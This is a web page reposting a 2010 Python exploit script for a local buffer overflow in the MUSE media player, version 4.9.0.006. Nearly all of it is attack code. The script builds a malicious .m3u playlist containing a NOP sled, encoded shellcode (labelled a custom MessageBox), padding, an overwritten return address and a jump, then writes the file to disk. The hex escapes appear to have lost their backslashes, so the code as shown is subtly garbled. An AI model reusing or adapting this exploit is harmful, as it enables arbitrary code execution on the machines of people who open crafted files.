Home / os / win7

muse_m3u.py.txt

Posted on 17 August 2010

# Exploit Title: MUSE v4.9.0.006 (.m3u) Local Buffer Overflow Exploit # Date: August 17, 2010 # Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com) # Software Link: http://download.cnet.com/MUSE/3000-2140_4-42511.html # Version: 4.9.0.006 # Tested on: Windows XP SP3 En buffersize = 205 nopsled = "x90" * 4 # Custom MessageBox # x86/shikata_ga_nai succeeded with size 104 (iteration=1) shellcode = ("xd9xe5x29xc9xbexe0xc8xa6x9fxb1x14xd9x74x24xf4" "x5fx83xc7x04x31x77x14x03x77xf4x2ax53xf7x8cx8a" "xbcx08x04xacxd9x4axbbx5ax47x38x30xfaxefxd1xdb" "xdcxa2x45x60x68x4exe2xefx71xd8x6fx8bx54x19x18" "x36xf4x6cxacxd0x9fxaex09x58x08xc3xf2xf7xacx73" "xa6x6fx48xe8xc1x8exa3x30x81x03x95xe0x98x49x12" "x44xa3x72xcfx77x9bxdcx48x65xd0x5dxd4x75x36") junk = "x90" * (buffersize-(len(nopsled)+len(shellcode))) njump = "xe9x29xffxffxff" eip = "x53x93x42x7e" payload = nopsled+shellcode+junk+eip+nopsled+njump try: print "[+] Creating exploit file.." exploit = open('muse.m3u','w'); exploit.write(payload); exploit.close(); print "[+] Writing", len(payload), "bytes to muse.m3u" print "[+] Exploit file created!" except: print "[-] Error: You do not have correct permissions.."

 

TOP